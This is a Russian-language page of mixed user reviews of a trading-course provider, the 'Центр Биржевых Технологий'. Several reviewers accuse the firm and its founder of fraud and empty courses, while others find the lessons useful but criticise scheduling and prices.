Когда-то в голову пришла идея научиться торговать также блестяще, как воротилы трейдинговых бирж. Но не знал, с чего начать. Обратился в Центр Биржевых Технологий. Честно говоря, функционал у сайта не очень удобный, из-за этих цветных блоков глаза разбегаются, просто не знал, что читать. Зато радует, что язык есть не только украинский, но и русский. Живу в Украине, но практически не знаю языка. Поэтому, чтобы не тратить время еще и на перевод некоторых слов, решил, что мультиязычность платформы – безусловный плюс. Ну что могу сказать по поводу обучения… Мне объяснили технические детали, в которых я был далек от понимания. Объяснили наглядно, доступно, на примерах. Не скажу, что стал прям гуру. Но специалисты помогли мне понять хотя бы азы этого бизнеса. Сам бы я даже за пять лет не справился. Только вот торговать все еще боюсь, не решаюсь выходить на рынок напрямую, самостоятельно. И всем советую не надеяться только на работу консультантов и аналитиков. Чтобы постигнуть это дело, придется и самому почитать специальную литературу.

Ответить

Проект с которым я потерял больше, чем приобрел
sosz Апрель 13, 2021
Хочу передать огромный привет основателю проекта Сергею Сарояну, который без стыда и совести наживается на простых людях, желающих получить новые знания. Я не поленилась и вбила запрос с его именем в поиске, дабы узнать, что это за фигура. Оказалось, что он и раньше занимался сомнительными проектами, которые закрывались один за другим сразу после того, как наберут достаточно денег от пострадавших. Естественно, Сароян сейчас на свободе и никакого наказания не понес. И естественно, пострадавшие своих денег не вернули. А может и были те, кому повезло, но о них мне ничего так и не удалось найти. Жаль, что я догадалась поискать нужную информацию лишь после того, как приобрела у них два курса, на которых не узнала ничего нового. Все изложено слишком сложным языком, а суть достаточно проста. Для новеньких, которые только приходят в этот бизнес, могли бы сделать и простую программу. А лучше всего, люди, просто не обращайтесь в эту компанию. Либо идите на те курсы, которые проходят в офисах вашего города, либо же просто штудируйте литературу самостоятельно. Нечего кормить всяких лохотронщиков!

Ответить

Они не могут продавать такие услуги
228 Апрель 26, 2021
А никого не смущает, что этой организации запрещено напрямую продавать свои услуги??? Юридически эта фирма имеет право только закрыть свой бизнес – и больше ничего. А они еще и имеют совесть и наглость впаривать людям свои курсы. И ведь находятся такие «богачи», которым деньги некуда девать, вот они и кормят их со своих рук. Почему никто не пытается искать либо отзывы, либо информацию о юридическом лице, на которое зарегистрирована фирма, прежде чем добровольно нести им свои денежки? Если вам их некуда девать, отдайте мне. А то сначала ведутся на столь банальный развод, потом плачутся. Друзья мои, никто вам своих секретов по заработкам не откроет даже за миллион, иначе потом все станут богатыми, а значит не будет по-настоящему богатым никто! Все, что происходит после того, как вы связываетесь с их менеджерами, будет для того, чтобы высосать из вас побольше денег. Причем высасывают даже не они, а другие мошенники, которые делятся процентом с этим Центром за то, что они делятся своей базой наивных дурачков. Не ленитесь обучаться самостоятельно и помните, что практически вся нужная информация по делу трейдинга есть в интернете БЕСПЛАТНО.

Ответить

Я пытался подать жалобу, но смысла в этом мало
Gilbert Апрель 28, 2021
После того как я потратил достаточно много денег на эти курсы от Центра Биржевых Тенхологий с крутыми специалистами. А в итоге получил ничего, реально ничего, никакой полезной практической информации, одна вода. В общем после этого все таки пытался пожаловаться, на мою жалобу даже не приняли и деньги я не верну.

Ответить

Смешно на самом деле
ООН Май 23, 2021
Мне смешно теперь читать якобы правдивые отзывы в интернете про данную компанию. Пишут, что они способны кого угодно обучить любой программе. По факту их спикеры не могут толком даже в теме разобраться. Я полный нуб и то больше них знаю в трейдинге. Жалко мне потраченных денег.

Ответить

Так много отзывов и так мало пользы
Никита Жучков Июль 28, 2021
Ну вот скажите мне, реально ли сейчас найти такую компанию, которая бы не обманывала клиентов и не пыталась бы им продать все что плохо лежит? Мне кажется, что таких остались уже единицы. ЦБТ не отличается от всех продажных. Также пишут про пользу своих курсов, а по факту предоставляют абсолютно ненужную. информацию, которую потом и на деле применить нельзя будет.

Ответить

Курсы просто пустые
Bnr91 Август 16, 2021
Я прошел здесь не один курс, думая, что сейчас уже стал специалистом хотя бы начального уровня. Решил попрактиковаться. И что же было дальше? Денег я потерял немало, ни одна их стратегия, которой меня обучали, не сработала. И я тоже дурак – нет бы остановиться после первой потерянной суммы. Так я же решил отработать все, чему меня учили, чтобы увериться в бесполезности их курсов до конца. Могу сказать, что не работает вообще ни одна стратегия. Иначе я хотя бы сколько-то смог выиграть. Но нет, все потерял и теперь встает вопрос – а чему они вообще там учат? Люди выходят от них, думая, что будут зарабатывать, станут профессионалами, а на выходе получается множество обманутых пользователей. И главное в какую красивую обертку это оборачивалось, сейчас просто диву даюсь! Думал, что раз специалисты так общаются, так себя ставят, значит это и впрямь люди понимающие. Но если применить эти знания на практике, становится понятно, что все это время на курсах они занимались лишь выкачкой денег и никто не собирался учить нас зарабатывать. Причем у меня сложилось такое впечатление, что после покупки курсов вы им становитесь как бы не нужны. Если до покупки, пока вы еще потенциальный клиент, вас красиво обрабатывают, чуть ли не облизывают, то после покупки стараются избавиться, чтобы вы не занимали их время, которое можно потратить на развод очередных будущих трейдеров.

Ответить

Кроме графика занятий, все да
Кирилл Декабрь 2, 2021
Не плохо, что дают реальные примеры и много практических занятий. Еще важно, что дали практики. На семинарах тоже был, рекомендую, все без бла бла и много полезной информации. Курс мне действительно помог разобраться во многих моментах, но график занятий конечно сделан не очень. Я как работающий человек скажу, что если есть возможность заниматься индивидуально — то да, это конечно классно, если карманы позволяют, но у меня была группа. Пока набрали ее я ждал, и потом еще и график составили ни туда и ни сюда, этим я недоволен.

Ответить

Мои первые он-лайн курсы
Dream Декабрь 15, 2021
Это мои первые курсы онлайн. Все вроде бы и ничего, дали много информации доступно и понятно. После теоретических занятий была практика, где мы получили также много нужных советов и наглядно посмотрели на живых примерах как происходит торговля. Все в принципе хорошо продумано. Но не продумано в онлайн занятиях только то, что никто вас заставлять учиться не будет, что вы должны были изучить дома то, или подготовить это — как было на офлайновских занятиях. И если у вас мало желания и мативации ничего не получится, здесь все зависит только от вас.

Внимание! Данный отзыв может являться заказным и вводить вас в заблуждение!
Ответить

Нормальное место,можно обучится
Александр Апрель 5, 2022
Нормальный центр и сотрудники нормальные,много полезной информации и семинары то что нужно.По оплате правда немного завышенные цены, но радует что можно по занятию платить.
Как по мне,то сфера трейдинга действительно есть востребованной сейчас, и не стоит упускать возможность обучится.
На данный момент с торгами я пока прекратил, но советы менеджеров мне безусловно помогали в решении задач во время торгов

Ответить

Я прошел обучение
Evel Декабрь 18, 2023
Закончил обучение в ЦБТ. Ну типа неплохо, но я бы и сам мог. Здесь просто есть преподаватели и срок обучения идёт намного быстрее. Они разработали программу и идут по ней.
Я тоже мог сделать себе программу опираясь на статьи в интернете, но это заняло было много времени. А в центре я прошел обучение быстро.
Здесь нет чего-то необычного, да они дали мне знания, но мне нужны были ещё какие-то плюшки, чтобы я был восторге и мог написать отзыв на 5 балов.

Ответить
Оставьте ваш отзыв
Все комментарии на нашем сайте проходят проверку на соответствие правилам сайта и уникальность, поэтому ваш комментарий может быть опубликован не сразу.
Ваш рейтинг
Ваш общий рейтинг:
Добавить фото

Отправить

0

19

commonly associated with

0

Быстрый ответ

Напишите ваше сообщение и нажмите «Отправить»



Вы здесь » Тестовик » Акции » Акция №2. (Семья)*отдаются персы за связь, оставленную в теме анкеты*